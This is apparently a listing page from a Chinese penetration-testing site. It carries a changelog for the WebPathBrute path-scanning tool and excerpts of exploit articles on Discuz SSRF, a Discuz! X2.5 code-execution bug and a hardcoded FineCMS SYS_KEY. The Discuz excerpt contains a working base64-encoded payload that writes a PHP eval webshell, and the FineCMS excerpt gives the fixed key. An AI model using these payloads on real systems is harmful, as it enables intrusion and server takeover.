工具分享 + 更多

web路径探测工具 7kbscan-WebPathBrute 1.5.2 (集成三字典)

web路径探测工具 7kbscan-WebPathBrute 1.5.2 (集成三字典)


1年前 (2017-08-07)   浏览:

————————-邪恶的分割线——————————– 使用与更新说明 1.5.2 Beta 2017-08-06 一、接受建议加入cookie功能 二、接受建议修改对URL的处理方法 去掉多余的 ‘/’ 三、对3xx结果 显示跳转后地址 http://www.xxx.xxx/admin/index.php ——–> login_redir.php 1.5.1 Beta 2017-08-05

渗透文章 + 更多

Discuz ssrf漏洞利用的几个python脚本

Discuz ssrf漏洞利用的几个python脚本

扫描本机开放的端口: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: Lcy # @Date:   2016-07-05 20:55:30 # @Last Modified by:   Lcy # @Last Modified time: 2016-10-10 16:26:14 import requests import thre

 2017-08-7
 0 
Discuz! X2.5 远程代码执行漏洞及EXP 0day

Discuz! X2.5 远程代码执行漏洞及EXP 0day

1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码 <?php @eval($_POST[

 2017-08-7
 0 
FineCMS SYS_KEY未初始化导致任意文件写入

FineCMS SYS_KEY未初始化导致任意文件写入

起初我以为这个sys_key是随机生成的.然后我本地和vps上发现都是一样的.最后去看了下源码发现没有生成这个值的地方.最后的最后看了开源的地址http://git.oschina.net/dayrui/finecms/blob/master/v5/config/system.php 发现是固定值 24b16fede9a67c9251d3e7c7161c83ac 文件:finecms/dayrui

 2017-08-7
 0 

扫一扫二维码分享
00:00/00:00